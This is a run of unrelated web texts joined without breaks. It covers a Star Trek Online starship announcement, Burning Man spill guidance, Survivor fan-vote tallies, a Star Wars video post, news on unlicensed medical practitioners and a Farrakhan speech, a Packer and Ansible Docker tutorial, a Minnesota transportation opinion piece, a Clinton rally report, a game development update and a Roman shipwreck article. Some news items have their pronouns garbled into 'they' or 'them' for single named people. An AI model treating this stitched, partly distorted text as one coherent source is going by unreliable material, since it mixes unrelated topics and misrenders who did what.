Instinctive Rerouting : Bonus to All Subsystem Power
Containment Layering : Temporary Hull ( based on Max Hull )
Heisenberg Decouping : Secondary Shields ( based on Max Shields )
Plasma Purge : Self-Targeted AOE Plasma Damage-over-Time
Ingenious Solutions : Bonus to Recharge Speeds for Bridge Officer and Captain Abilities
Barclay Maneuver : Photonic Copy of your starship which uses Ramming Speed on a nearby foe
Which Ability Sequence must be activated , and which Innovation Effect is triggered are both randomized each time the mechanic refreshes . It will refresh after a brief lockout period which follows each triggered effect , or whenever you first enter a new instance .
Universal Consoles
Console - Universal – Ablative Salvage Pods
Untold years of starship design study make it second-nature to know the right structural weak spots to hit to send chunks of hull flying into space with your starship 's weapons . This firing mode represents that knowledge , coupled with a willingness to perform field repairs using whatever materials may be handy - including those chunks of enemy starships ! Tractor in the debris to grant yourself additional defenses , after activating this mode to briefly cause Supply Pods to be spawned near foes that you deal damage to .
This console also provides a passive boost to Damage Resistance Rating vs . Exotic Damage , and Bonus Earned Experience .
This console comes standard on these starships :
Scott class Operations Miracle Worker Cruiser
Mur'Eq class Operations Miracle Worker Cruiser
Nijil class Operations Miracle Worker Warbird
Console - Universal – Delayed Causality Plating
Sometimes genius is accidental , and nowhere is that more true than when you dare to tamper with temporal causality . By manipulating the chroniton flux present within the plating of your starship , you can temporarily defer incoming damage , while also speeding up your weapon cycles and ability cooldowns . While active , no damage will be sustained . However , once the effect ends , causality takes its due in the form of deadly chroniton radiation that can not be removed ( but can be reduced by resistances ) . This grants the benefit of spreading out a potentially deadly spike of incoming damage over a much longer period of time , allowing you additional time to enact countermeasures . But destiny can not be forestalled indefinitely !
This console also provides a passive boost to Starship Hull Penetration Skill , and Bonus Earned Experience .
This console comes standard on these starships :
Daystrom class Science Miracle Worker Cruiser
Antaak class Science Miracle Worker Cruiser
Varel class Science Miracle Worker Warbird
Console - Universal – Crimson Forcefield
Originally invented by Geordi La Forge as a ruse to outwit their would-be captors , this piece of technology eventually ended up being made into reality many years later . Although it was originally intended to cripple only the weapon systems of a number of enemy combatants , it 's final design also ended up having a debilitating effect on the enemies ' ability to repair any damage their ship has sustained .
This console also provides a passive boost to Recharge Times of Hull Healing Bridge Officer Abilities , and Bonus Earned Experience .
This console comes standard on these starships :
Tucker class Tactical Miracle Worker Cruiser
Klothos class Tactical Miracle Worker Cruiser
Tebok class Tactical Miracle Worker Warbird
Starship Traits
Stay At Your Posts
Activating an Engineering or Miracle Worker Bridge Officer ability will reduce the recharge time of Tactical Bridge Officer abilities . The amount of cooldown reduction is increased if you are currently below half of your maximum hull capacity . This may only occur once every few seconds .
If current Hull at or above 50 % : -10 % Recharge Time on Tactical Bridge Officer abilities
If current Hull below 50 % : -20 % Recharge Time on Tactical Bridge Officer abilities
Can occur once every 5 seconds
This Starship Trait unlocks after reaching Rank 5 in Starship Mastery on the following ships :
Scott class Operations Miracle Worker Cruiser
Mur'Eq class Operations Miracle Worker Cruiser
Nijil class Operations Miracle Worker Warbird
Photonic Boarding Party
Photonic Boarding Party does not require you to launch Shuttles . Instead , your boarding assault teams immediately beam over to the targeted foe 's ship , and immediately begin applying the debilitating effects already associated with Boarding Party . Using Photonic Boarding Parties is also more time efficient , allowing them to be ready to deploy more quickly . Note : Having this trait slotted removes the Shuttles entirely from this ability , potentially interfering with any effects designed to enhance them .
Activating any rank of Boarding Party no longer launches Shuttles and instead instantly applies the effects to the targeted Foe
Recharge time of Boarding Party reduced from 60sec to 40sec
This Starship Trait unlocks after reaching Rank 5 in Starship Mastery on the following ships :
Daystrom class Science Miracle Worker Cruiser
Antaak class Science Miracle Worker Cruiser
Varel class Science Miracle Worker Warbird
Redirecting Arrays
While Beam : Fire-at-Will is active , any damage that your starship receives will periodically extend its duration .
Once per sec while Beam : Fire-at-Will is active , receiving Any Damage grants 0.33 sec Duration to Fire-at-Will ( 15 sec total duration maximum )
This Starship Trait unlocks after reaching Rank 5 in Starship Mastery on the following ships :
Tucker class Tactical Miracle Worker Cruiser
Klothos class Tactical Miracle Worker Cruiser
Tebok class Tactical Miracle Worker Warbird
( * * All of the above details are subject to change . )
Availability
These starships will be available in the C-Store individually , or in faction-specific packs of 3 variants each , or as a single “ Mega-Bundle ” containing all 9 starships .
Exact features , stats , and additional details on this set of resilient and versatile starships will be posted to this website very soon . Keep an eye pealed !
Jeremy “ BorticusCryptic ” Randall
Cryptic Studios
Lead Systems Designer
Hey ! Are you hitchhiking to Black Rock City this year , then sleeping in a tent with no cookstove ?
No ?
If you 're bringing any type of liquid to the playa this year ( even cooler water , but especially motor oil ) , you need to be aware of how spills affect the desert . Matter Out of Place is n't limited to wood chips and cigarette butts . It encompasses anything that does n't occur naturally on the playa surface . Spills and drips are everyone 's responsibility :
Your car , RV , mutant vehicle or motorcycle can leak oil and fluids .
Your kitchen and shower can leak cooking fuel and gray water .
Your black water tank ( ew ) can ( ew ) all over the ( ew ) .
If you spill or drip , you must clean it up ! Here 's why , and how .
For more than a decade , the Bureau of Land Management has been paying attention to pollutants—particularly motor oil—that are left behind by Burning Man 's thousands of vehicles . Those pollutants soak into the playa , resurfacing during rains and potentially affecting the seasonal lake that covers the hardpan during winter .
In 2012 , the BLM released its Environmental Assessment of Burning Man 's impact on the Black Rock Desert . One of the major points of concern was those pesky drips and spills . Over the years , they can really add up to a significant pollution threat . In fact , Burning Man 's polluting effect could be pretty bad , if it was n't for the dedication of every member of our community . Including YOU .
Burning Man is n't the only group that uses the Black Rock Desert recreationally ; It 's in use throughout the year by vehicles of all types . “ What happens with drippage , trash disposal and camp fires during Burning Man is nothing different that what is happening on all public lands and at camp sites , ” says Karen Dallett , Executive Director of the non-profit Friends of Black Rock organization . “ It 's simply compacted and has a huge accumulative effect with 60,000 people being in one place at the same time . ”
In other words , it 's not our behavior that makes us the Black Rock Desert 's biggest potential polluter ; it 's our numbers . Our behavior is what keeps us from causing major pollution .
The BLM backs this up , and is asking us , as a community , to continue taking precautions against those oil drips . Every large group using the playa is required to take similar precautions , but in our case it matters more .
Of course , oil drips and gray water spills are n't something that Burning Man can really enforce . This one comes down to you , your friends and campmates . It 's up to you to modify your behavior and lower our collective impact on the desert ecosystem . Are you up to it ?
I thought you might be ! Here 's what you can do .
How to Prevent Drips and Spills
Get a tune-up on that car before you come out to the playa !
Bring an oil pan or thick piece of cardboard or some carpet to lay under for every vehicle and RV , whether or not you think it leaks . Put it under the vehicle as soon as you park , and do n't forget to weight it down !
Make a camp plan for anything that can spill , from gray water to bacon grease . Plan ahead for packing that splashy , gross stuff out !
What to Do if Something Spills
Clean it up !
Bring a Shovel and Bucket to scoop up any nastiness !
Dispose of polluted soil with other hazardous waste . Do n't you wish you 'd avoided spilling it in the first place ?
A final note : Every year , somebody 's RV water tank “ spills ” its contents into the soil . The DPW Playa Restoration crew has the great privilege of discovering these sites and cleaning them up , sometimes by digging out all the affected soil and carting it away . If you 're reading this , you probably wo n't be an offender . But if you happen to have a spill , please let Earth Guardians or the Rangers know and do what you can to clean it up . And if you see your neighbor emptying something they should n't onto the playa surface , please kindly let them know why their action could have a negative effect on Burning Man 's future use of public lands .
Two weeks ago we opened voting polls for our fantasy season , Survivor : Indonesia – Missed Opportunities . 32 former pre-merge , one-time only players , that missed their opportunity to cement their Survivor legacies the first time around .
Inside Survivor selected 32 past pre-mergers that have only played the game once . You the readers then voted for ten men and ten women to decide your final cast of 20 . The votes have been counted and verified and here is the cast that you picked ! We have separated them into two tribes .
The Matahari tribe ( which means “ sun ” in Indonesian ) is made up of Anna Khait , Christine Shields-Markosi , So Kim , Alecia Holden , and Nadiya Anderson for the women . And Ace Gordon , Brice Johnston , Hunter Ellis , Spencer Duhm and Aaron Reisberger for the men .
The Bulan tribe ( which means “ moon ” in Indonesian ) is made up of Alexis Maxwell , Tracy Hughes-Wolf , J'Tia Tayler , Amy O'Hara and Stephanie Valencia for the women . And Silas Gaither , Darnell Hamilton , John Cody , Cao Boi Bui and Marcus Lehman for the men .
Full Results for the Women :
Anna Khait 1445 8 % Tracy Hughes-Wolf 1397 7.8 % So Kim 1387 7.7 % Stephanie Valencia 1279 7.1 % Christine Shields-Markosi 1263 7 % J'Tia Taylor 1210 6.7 % Amy O'Hara 1142 6.3 % Alexis Maxwell 1141 6.3 % Nadiya Anderson 1114 6.2 % Alecia Holden 1073 6 % Liz Markham 1026 5.7 % Gina Crews 1021 5.7 % Marisa Calihan 981 5.5 % Lindsey Richter 971 5.4 % Laura Alexander 864 4.8 % Lindsey Cascaddan 682 3.8 %
Full Results for the Men :
Silas Gaither 1441 8.2 % John Cody 1396 8 % Brice Johnston 1340 7.6 % Cao Boi Bui 1303 7.4 % Aaron Reisberger 1299 7.4 % Ace Gordon 1258 7.2 % Marcus Lehman 1223 7 % Spencer Duhm 1156 6.6 % Hunter Ellis 1090 6.2 % Darnell Hamilton 1059 6 % Max Dawson 947 5.4 % Drew Christy 913 5.2 % Peter Baggenstos 882 5 % Zane Knight 863 4.9 % Bobby Mason 795 4.5 % Cliff Robinson 576 3.3 %
How would this season pan out if it became a reality ? Who would capitalize on their second opportunity and elevate themselves to Survivor glory ? Let us know your thoughts in the comments below .
Thanks to everyone that took part .
Share This Video Facebook Twitter EMAIL
It 's practically a foregone conclusion that Star Wars : The Force Awakens will wipe away the sins of the prequels , win every Oscar , and vanish Voldemort , er , Trump to the red waste that is Tatooine . No pressure , J.J. Abrams .
Okay… but what if it stinks ?
Every indication is that Episode VII will be the best Star Wars movie since The Empire Strikes Back — even George Lucas liked the film , although they have four billion reasons to say nice things . But there 's always the chance that Force Awakens , which comes out next week , will be , well , the next Phantom Menace .
Funny Local News Bloopers compiled grainy interview footage from 1999 right before and after naive Star Wars fans saw The Phantom Menace for the first time . Ah , we were so young back then , and very dumb . The positive reactions far outnumber the negative reviews . Not just among children , either . It 's one thing for a kid to think Jar Jar is fun — it 's another when someone thinks The Phantom Menace is going to be the next Wonder of the World and a grown man praises the film for its noise . Throw some rocks in a shoebox and shake the thing . That 's noisy , and does n't have Watto .
There 's only one guy at the end of the video who “ gets ” it ( hint : it 's not Shaq ) . May the Force be strong with him .
Now Watch : Are Star Wars Fans The Craziest Fans ?
Two fake medical professionals have been convicted in separate trials in Brooklyn and Queens this month , the state attorney general 's office said Friday .
Both phonies were practicing despite having no license , AG Eric Schneiderman said .
In one case , Alexander Hollander , 70 , was a former dentist who lost their license to practice after a June 2000 Medicaid fraud conviction , the AG said .
Hollander still owed $ 140,000 restitution from that fraud . When Medicaid officials went looking for him , they caught them at their 7th Avenue Dental Office in Sunset Park .
Hollander handed their business card to a Medicaid undercover investigator — “ Doctor of Dental Surgery , ” it read .
In an unrelated case , the other fake , Noucheline Jean , 45 , lied that they were a licensed practical nurse and spent 18 months treating patients at the Park Nursing Home in Rockaway Park , the AG said .
Hollander and Jean have August sentencing dates .
Louis Farrakhan stated “ We need to put the American flag down . Because we 've caught as much hell under that as the Confederate flag ” in remarks before the Metropolitan AME Church in Washington , DC on Wednesday first reported by DC 's WMAL .
Farrakhan said , “ White folks march with you because they do n't want you upsetting the city , they do n't give a damn about them nine . ”
They added that when the police took suspected shooter Dylann Roof to Burger King they were saying “ You did a good job . Kill all them [ bleep . ] ”
Later , they declared , “ I do n't know what the hell the fight is about over the Confederate flag . We need to put the American flag down . Because we 've caught as much hell under that as the Confederate flag , ” comments that were meant with cheers and applause . They added , “ Who are we fighting today ? It 's the people that carry the American flag . ”
Audio via WMAL .
Follow Ian Hanchett on Twitter @ IanHanchett
Packer + Ansible - Dockerfile = AwesomeContainer
December 03 , 2017
As a trendy software engineer , I use Docker because it 's a nice way to try software without environment setup hassle . But as an SRE/DevOps kinda guy I also create my own images – for CI environment , for experimenting and sometimes even for production .
We all know that Docker images are built with Dockerfiles but in my not so humble opinion , Dockerfiles are silly - they are fragile , makes bloated images and look like crap . For me , building Docker images was tedious and grumpy work until I 've found Ansible . The moment when you have your first Ansible playbook work you 'll never look back . I immediately felt grateful for Ansible 's simple automation tools and I started to use Ansible to provision Docker containers . During that time I 've found Ansible Container project and tried to use it but in 2016 it was not ready for me . Soon after I 've found Hashicorp 's Packer that has Ansible provisioning support and from that moment I use this powerful combo to build all of my Docker images .
Hereafter , I want to show you an example of how it all works together , but first let 's return to my point about Dockerfiles .
Why Dockerfiles are silly
In short , because each line in Dockerfile creates a new layer . While it 's awesome to see the layered fs and be able to reuse the layers for other images , in reality , it 's madness . Your images size grows without control and now you have a 2GB image for a python app , and 90 % of your layers are not reused . So , actually , you do n't need all these layers .
To squash layers , you either use do some additional steps like invoking docker-squash or you have to give as little commands as possible . And that 's why in real production Dockerfiles we see way too much & & s because chaining RUN commands with & & will create a single layer .
To illustrate my point , look at the 2 Dockerfiles for the one of the most popular docker images – Redis and nginx . The main part of these Dockerfiles is the giant chain of commands with newline escaping , inplace config patching with sed and cleanup as the last command .
RUN set -ex ; \ \ buildDeps= ' \ wget \ \ gcc \ libc6-dev \ make \ ' ; \ apt-get update ; \ apt-get install -y $ buildDeps -- no-install-recommends ; \ rm -rf /var/lib/apt/lists/ * ; \ \ wget -O redis.tar.gz `` $ REDIS_DOWNLOAD_URL '' ; \ echo `` $ REDIS_DOWNLOAD_SHA * redis.tar.gz '' | sha256sum -c - ; \ mkdir -p /usr/src/redis ; \ tar -xzf redis.tar.gz -C /usr/src/redis -- strip-components=1 ; \ rm redis.tar.gz ; \ \ # disable Redis protected mode [ 1 ] as it is unnecessary in context of Docker # ( ports are not automatically exposed when running inside Docker , but rather explicitly by specifying -p / -P ) # [ 1 ] : https : //github.com/antirez/redis/commit/edd4d555df57dc84265fdfb4ef59a4678832f6da grep -q '^ # define CONFIG_DEFAULT_PROTECTED_MODE 1 $ ' /usr/src/redis/src/server.h ; \ sed -ri 's ! ^ ( # define CONFIG_DEFAULT_PROTECTED_MODE ) 1 $ ! \1 0 ! ' /usr/src/redis/src/server.h ; \ grep -q '^ # define CONFIG_DEFAULT_PROTECTED_MODE 0 $ ' /usr/src/redis/src/server.h ; \ # for future reference , we modify this directly in the source instead of just supplying a default configuration flag because apparently `` if you specify any argument to redis-server , [ it assumes ] you are going to specify everything '' # see also https : //github.com/docker-library/redis/issues/4 # issuecomment-50780840 # ( more exactly , this makes sure the default behavior of `` save on SIGTERM '' stays functional by default ) \ make -C /usr/src/redis -j `` $ ( nproc ) '' ; \ make -C /usr/src/redis install ; \ \ rm -r /usr/src/redis ; \ \ apt-get purge -y -- auto-remove $ buildDeps
All of this madness is for the sake of avoiding layers creation . And that 's where I want to ask a question – is this the best way to do things in 2017 ? Really ? For me , all these Dockerfiles looks like a poor man 's bash script . And gosh , I hate bash . But on the other hand , I like containers , so I need a neat way to fight this insanity .
Ansible in Dockerfile
Instead of putting raw bash commands we can write a reusable Ansible role invoke it from the playbook that will be used inside Docker container to provision it .
This is how I do it
FROM debian:9 # Bootstrap Ansible via pip RUN apt-get update & & apt-get install -y wget gcc make python python-dev python-setuptools python-pip libffi-dev libssl-dev libyaml-dev RUN pip install -U pip RUN pip install -U ansible # Prepare Ansible environment RUN mkdir /ansible COPY . /ansible ENV ANSIBLE_ROLES_PATH /ansible/roles ENV ANSIBLE_VAULT_PASSWORD_FILE /ansible/.vaultpass # Launch Ansible playbook from inside container RUN cd /ansible & & ansible-playbook -c local -v mycontainer.yml # Cleanup RUN rm -rf /ansible RUN for dep in $ ( pip show ansible | grep Requires | sed 's/Requires : //g ; s/ , //g ' ) ; do pip uninstall -y $ dep ; done RUN apt-get purge -y python-dev python-pip RUN apt-get autoremove -y & & apt-get autoclean -y & & apt-get clean -y RUN rm -rf /var/lib/apt/lists/ * /tmp/ * /var/tmp * /usr/share/doc/ * # Environment setup ENV HOME /home/test WORKDIR / USER test CMD [ `` /bin/bash '' ]
Drop this Dockerfile to the root of your Ansible repo and it will build Docker image using your playbooks , roles , inventory and vault secrets .
It works , it 's reusable , e.g . I have some base roles that applied for docker container and on bare metal machines , provisioning is easier to maintain in Ansible . But still , it feels awkward .
Packer with Ansible provisioner
So I went a step further and started to use Packer . Packer is a tool specifically built for creating of machine images . It can be used not only to build container image but VM images for cloud providers like AWS and GCP .
It immediately hooked me with these lines in the documentation :
Packer builds Docker containers without the use of Dockerfiles . By not using Dockerfiles , Packer is able to provision containers with portable scripts or configuration management systems that are not tied to Docker in any way . It also has a simple mental model : you provision containers much the same way you provision a normal virtualized or dedicated server .
That 's what I wanted to achieve previously with my Ansiblized Dockerfiles .
So let 's see how we can build Redis image that is almost identical to the official .
Building Redis image with Packer and Ansible
First , let 's create a playground dir
$ mkdir redis-packer & & cd redis-packer
Packer is controlled with a declarative configuration in JSON format . Here is ours :
{ `` builders '' : [ { `` type '' : `` docker '' , `` image '' : `` debian : jessie-slim '' , `` commit '' : true , `` changes '' : [ `` VOLUME /data '' , `` WORKDIR /data '' , `` EXPOSE 6379 '' , `` ENTRYPOINT [ \ '' docker-entrypoint.sh\ '' ] '' , `` CMD [ \ '' redis-server\ '' ] '' ] } ] , `` provisioners '' : [ { `` type '' : `` ansible '' , `` user '' : `` root '' , `` playbook_file '' : `` provision.yml '' } ] , `` post-processors '' : [ [ { `` type '' : `` docker-tag '' , `` repository '' : `` docker.io/alexdzyoba/redis-packer '' , `` tag '' : `` latest '' } ] ] }
Put this in redis.json file and let 's figure out what all of this means .
First , we describe our builders – what kind of image we 're going to build . In our case , it 's a Docker image based on debian : jessie-slim . commit : true tells that after all the setup we want to have changes committed . The other option is export to tar archive with the export_path option .
Next , we describe our provisioner and that 's where Ansible will step in the game . Packer has support for Ansible in 2 modes – local and remote .
Local mode ( `` type '' : `` ansible-local '' ) means that Ansible will be launched inside the Docker container – just like my previous setup . But Ansible wo n't be installed by Packer so you have to do this by yourself with shell provisioner – similar to my Ansible bootstrapping in Dockerfile .
Remote mode means that Ansible will be run on your build host and connect to the container via SSH , so you do n't need a full-blown Ansible installed in Docker container – just a Python interpreter .
So , I 'm using remote Ansible that will connect as root user and launch provision.yml playbook .
After provisioning is done , Packer does post-processing . I 'm doing just the tagging of the image but you can also push to the Docker registry .
Now let 's see the provision.yml playbook :
-- - - name : Provision Python hosts : all gather_facts : no tasks : - name : Boostrap python raw : test -e /usr/bin/python || ( apt-get -y update & & apt-get install -y python-minimal ) - name : Provision Redis hosts : all tasks : - name : Ensure Redis configured with role import_role : name : alexdzyoba.redis - name : Create workdir file : path : /data state : directory owner : root group : root mode : 0755 - name : Put runtime programs copy : src : files/ { { item } } dest : /usr/local/bin/ { { item } } mode : 0755 owner : root group : root with_items : - gosu - docker-entrypoint.sh - name : Container cleanup hosts : all gather_facts : no tasks : - name : Remove python raw : apt-get purge -y python-minimal & & apt-get autoremove -y - name : Remove apt lists raw : rm -rf /var/lib/apt/lists/ *
The playbook consists of 3 plays :
Provision Python for Ansible Provision Redis using my role Container cleanup
To provision container ( or any other host ) for Ansible , we need to install Python . But how install Python via Ansible for Ansible ? There is a special Ansible raw module for exactly this case – it does n't require Python interpreter because it does bare shell commands over SSH . We need to invoke it with gather_facts : no to skip invoking facts gathering which is done in Python .
Redis provisioning is done with my Ansible role that does exactly the same steps as in official Redis Dockerfile – it creates redis user and group , it downloads source tarball , disables protected mode , compile it and do the afterbuild cleanup . Check out the details on Github .
Finally , we do the container cleanup by removing Python and cleaning up package management stuff .
There are only 2 things left – gosu and docker-entrypoint.sh files . These files along with Packer config and Ansible role are available at my redis-packer Github repo
Finally , all we do is launch it like this
$ GOPATH/bin/packer build redis.json
You can see example output in this gist
In the end , we got an image that is even a bit smaller than official :
$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE docker.io/alexdzyoba/redis-packer latest 05c7aebe901b 3 minutes ago 98.9 MB docker.io/redis 3.2 d3f696a9f230 4 weeks ago 99.7 MB
Any drawbacks ?
Of course , my solution has its own drawbacks . First , you have to learn new tools – Packer and Ansible . But I strongly advise for learning Ansible , because you 'll need it for other kinds of automation in your projects . And you DO automate your tasks , right ?
The second drawback is that now container building is more involved with all the packer config , ansible roles and playbooks and stuff . Counting by the lines of code there are 174 lines now
$ ( find alexdzyoba.redis -type f -name ' * .yml ' -exec cat { } \ ; & & cat redis.json provision.yml ) | wc -l 174
While originally it was only 77 :
$ wc -l Dockerfile 77 Dockerfile
And again I would advise you to go this path because :
It 's reusable . You can apply the Redis role not only for the container but also for your EC2 instance or bare metal service or pretty much anything that runs Linux with SSH . It 's maintainable . Come back few months later and you 'll still understand what 's going on because Packer config , playbook and role is structured and even commented . And you build the image with a simple packer build redis.json command to produce ready and tagged image . It 's extensible . You can use pretty much the same role to provision Redis version 4.0.5 by simply passing redis_version and redis_download_sha variables . No new Dockerfile needed .
Conclusion
So that 's my Docker image building setup for now . It works well for me and I kinda enjoy the process now . I would also like to look at Ansible Container again but that will be another post , so stay tuned – this blog has Atom feed and I also post on Twitter @ AlexDzyoba
Minnesota 's legislative session begins tomorrow and , like many states throughout the union , front and center on the agenda is transportation spending . From this weekend 's edition of the Star Tribune :
`` Anybody who travels around the state knows our highways are in worse condition , our traffic congestion is getting worse , public transit is far behind other parts of the country and world in terms of its adequacy and efficiency , ” [ Minnesota Governor Mark ] Dayton said in an interview . “ I can guarantee that if we do n't make it better , it 's going to continue to get worse . ”
Making it “ better ” means , of course , spending more money . There is no talk of reform . There is nobody really asking how we got in such a difficult financial situation . The only question under consideration is the one I outlined in my latest book , A World Class Transportation System : How do we get more money to continue doing more of the same thing ?
More is better .
The Star Tribune reported that , “ about 1,200 of Minnesota 's more than 20,000 bridges are classified as structurally deficient. ” They attributed Transportation for America later in naming the exact number : 1,191 . The 2013 Transportation for America bridge report was an update of a 2011 report on the same topic . While the 2013 update did n't include the cost of repairs , the 2011 report did .
T4A indicated in 2011 that the cost to repair Minnesota 's structurally-deficient bridges was $ 500 million . That 's a lot of money , but these bridges also accommodate a combined 2.3 million crossings per day .
Contrast that with the new bridge over the St. Croix River that is currently under construction . At somewhere around $ 600 million , it will carry a projected 16,000 cars per day . You can use the project webcam to watch your money being spent .
Maintain 1,191 existing bridges : $ 500 million . Build one new bridge : $ 600 million . The former is a crisis while the latter a destiny .
This is just one specific example of a fact that was captured exquisitely in a graphic that went along with the Star Tribune story . As you look at this , keep in mind that the problem we are being told we have is insufficient money to maintain everything we have built . As our state 's version of a transportation advocacy organization , Move MN , has said , we are the “ Land of 10 million potholes ” . Well , here 's how we prioritize maintenance .
Advertisement Hillary Clinton focuses on immigration during Salinas speech Share Copy Link Copy
Presidential candidate Hillary Clinton delivered a speech at Hartnell College in Salinas Wednesday afternoon.The former first lady and secretary of state was escorted by Secret Service agents from Salinas airport to their campaign rally inside Hartnell College 's small auxiliary gym.U.S . Congressional candidate Jimmy Panetta accompanied Clinton as they walked into the gym at 2:54 p.m. and introduced them on stage.PHOTOS : Hillary Clinton stumps in SalinasClinton 's speech focused on helping hard-working immigrants find a path toward legal residency and keeping families together . They slammed the presumptive Republican nominee , Donald Trump , over their plan to build a wall along the U.S.-Mexico border.RAW VIDEO : Watch Hillary Clinton 's Salinas speech Part 1 // Part 2Clinton never mentioned their Democratic Party rival , Bernie Sanders.A line of people who waited for hours Wednesday for a chance to attend the rally stretched across a quad and down several blocks.The gym had a capacity of 578 people , and the rally had a first-come , first-serve policy at the door . Some people waiting in line said they were planning to vote for Sanders , but they still wanted to attend Clinton 's Salinas rally.State Assemblyman Luis Alejo was chosen as one of the rally 's speakers . `` I am proud to personally support former Secretary Hillary Clinton in their candidacy for president of the United States , ” said Alejo , who serves as chair of the California Latino Legislative Caucus . `` For decades , California 's Latino legislators have fought to build bridges of opportunity for Californians . Hillary Clinton has been a lifetime champion for the same things we fight for in California 's Latino community : better jobs , better education , better health care and an opportunity for hard-working Californians to achieve their dreams for themselves and their families . They have also proven that they will fight to ensure our nation 's immigrants are treated with dignity and respect , '' Alejo said.READ MORE : Latino vote in California targeted by Clinton , SandersA small gathering of demonstrators protested against Clinton and accused them of splitting up undocumented immigrants ' families through deportations . Signs read , `` Pro-women , Anti-Hillary , '' and `` Hillary needs to be indicted , not elected . `` Most protesters did not appear to support Sanders or Trump , either.Sanders was busy Wednesday at two California campaign rallies , one in Cathedral City and another in Lancaster . Trump campaigned in Anaheim.California 's presidential primary is June 7 .
Long silence
We have recently received many questions as well as negative feedbacks which made an emphasis on the fact that it 's been long time we do not post any updates and news on game development . This is actually true , the silence remained for quite a long period . However , we would like to say that there is nothing to be preoccupied with for the development is underway , and such update pauses mean nothing but total team absorption in the process of development . In our staff we do not have any PR/community manager , but working on updates as well as communicating with players do take a lot of time . Therefore , right from the beginning , we have been trying to provide you with new information only when we have something important to share . It 's not like writing several messages on Twitter , but rather gathering huge blocks of information altogether and presenting it all to you . We hope that you find will this update interesting and it will manage to dispel all the doubts which some of the backers have .
On one hand , we wanted to preserve the same principle of rare updates posting , but including detailed information on all development news . On the other hand , we feel that there is a certain lack of communication between community and the team , and therefore , we are ready to do our best to fix it . Quite long time ago , we got our own small subreddit ( thank you guys for creating it ! ) and we thought that it could become a perfect communication platform to keep in touch with our community . Thus , if you have some questions which have not been answered in our updates or it seems that the silence has dragged on again , you can get to us there . Apart from it , our Twitch-channel has been active for all this time . There you can observe graphics development process and pose different questions to our designers & artists .
Okay , let 's get to the principal part of this article . Let 's see what has been done during these several months . The progress is really significant for we have finally got a fully-functioning prototype in which the major part of key features and technologies have been implemented that are necessary for further project development .
Level generator . Currently , we have completed a great part of work on level generator , allowing to gather new unique levels from randomly-selected macro-tiles . ( To get detailed information on macro-tiles , please follow the link ) . We are extremely glad the way it functions as well as the opportunities and freedom it brings to level designer . Now , it 's time to extend the macro-tiles pull . And this is the task we are going to be focused on the following several months . Local level map . Having completed the level generator , it allowed us to incorporate right away the reflection of local level map in the game . It might seem like an elementary component , however , taking into consideration the scale of generated levels , the appearance of such a dynamically-generated map significantly simplifies the orientation .
( Local level map example . Please , consider that it is a draft version of the graphics . )
Besides , level generator completion allowed us to make a significant contribution to the development of enemies generation and allocation mechanism as well as loot system .
Quests . Perhaps , it is the most important part in the whole list . During these last months , we managed to incorporate a quest system in the game , and , currently , we are actively testing it , gradually adding new tasks which Herald might face on their way as well as fraction system .
Certainly , there are still lots of things to be done to develop the system , however the current progress gives hope and foresees great results .
Support for gamepads has been integrated . Do n't ask why we did not do it earlier - we do not know it either . We conducted various tests in this direction , but the full-fledged work unfolded relatively not long time ago . However , we should point out that it was worth waiting - UnDungeon feels way much better with gamepad , even though keyboard usage does have its own pluses as well . We are trying to make these 2 types of controllers equally usable . A new class of neutral creatures and animals which inhabit the game world has been added .
As it 's been pointed out in the previous update , we are still working to optimize the combat system . ( full screen sample ) It does not make much sense to describe all changes made , nevertheless , we would like to emphasize 2 important details . First of all , the accent has been shifted onto melee and close range-abilities , which , in their turn , changes the balance , makes the character more actively apply its mobility abilities . Secondly , we made some alterations in AI and enhanced a major part of enemies with new skills , which allow them to better attack and defend , considering a new force layout . Thus , for example , Hazmats , well-known to you for we demonstrated them in previous materials earlier , now are able to run and jump , avoiding attacks and projectiles .
In general , the game is becoming less arcade and more demanding to player 's skills ( but it still does not mean that we are creating a ultra-hardcode game ! ) . The development process is going on… And , of course , we are filling the game with the content - new abilities , items , enemies , quests , events , and so on and so forth…
The project is developing and gradually evolving towards the direction which has been initially determined . Unfortunately , this process is not going as fast as it 's been planned . UnDungeon - is our passion project which grew out of the dream to develop a good and original game . At the initial development stage , the majority of us were not experienced enough and , therefore , made a great number of mistakes as well as inappropriate decisions , but , we always tried to fix them , thus , step by step , gaining valuable experience . Now , we are way much better at planning and implementing our ideas , but still , we are not perfect . Like many other indie teams , once we got trapped by overestimating our own capabilities and underestimating the amount of work to be done . What does it mean ? Basically , we have 2 event course options : either cut a major part of what has been planned and already done from the game in order to reduce the time necessary for development or carry on working to finalize the plan , but slightly postponing the release . We love UnDungeon and that is why we want to deliver the game the way it was conceived . Therefore , we choose the second option . As regards a new release date , you will be notified very soon . We would like to assure you that there is nothing to be worried about : we are not going to be stuck in the development for years .
However , we have good news for you . At the beginning of the next year , we are planning on releasing a demo-version for our backers . It will be limited in its content and quite raw , but it will represent the significant part of game mechanics and core gameplay . We hope that the things which you see will appeal to you and we 'll will be looking forward to your feedbacks . Also there is a plan to regularly deliver a new builds for backers . We do not want to drag on the demo-release , as the earlier it is available , the more time we 'll have to gather your feedbacks as well as fix all the issues and bugs . Apart from it , we are discussing the possibility of releasing a public demo-version several months later the demo for backers . As regards survey and physical rewards . As it is usually done for Kickstarter projects , survey and sending-out rewards will occur closer to the date release . It is all for today ! Soon , we are planning another update with important news on development progress . Stay tuned !
Ri Ra , Laughing Machines gamedesigner
An ancient Roman shipwreck nearly 2,000 years old may once have held an aquarium onboard capable of carrying live fish , archaeologists suggest .
The shipwreck , which lay 6 miles ( nearly 10 kilometers ) off the town of Grado in Italy , was discovered by accident in 1986 . Approximately 55 feet ( 16.5 meters ) long , it dated back to the mid-second century and had a cargo of about 600 large vases known as amphoras that contained sardines , salted mackerel and other fish products .
Curiously , its hull possessed a unique feature — near its keel was a lead pipe at least 2.7 inches ( 7 cm ) wide and 51 inches ( 1.3 meters ) long . Why pierce its bottom with a hole that seawater could rise up ?
IN PICTURES : World 's 20 weirdest fish
Scientists now suggest this pipe was connected to a hand-operated pump to suck up water . The aim ? To keep a constant supply of flowing , oxygenated water into a fish tank onboard the ship . [ Images of device and shipwreck ]
`` Historians think that before the invention of the freezer , the only possibility to trade fish was to salt or dry it , but now we know that it was possible to move it alive also for quite a long distance , '' researcher Carlo Beltrame , an archaeologist at Ca ' Foscari University of Venice , told LiveScience .
A number of texts from antiquity have contentiously suggested the ancient Romans could transport live fish by sea . For instance , the scientist , Roman officer and historian Pliny the Elder spoke of transport of parrotfish from the Black Sea to the coast of Naples .
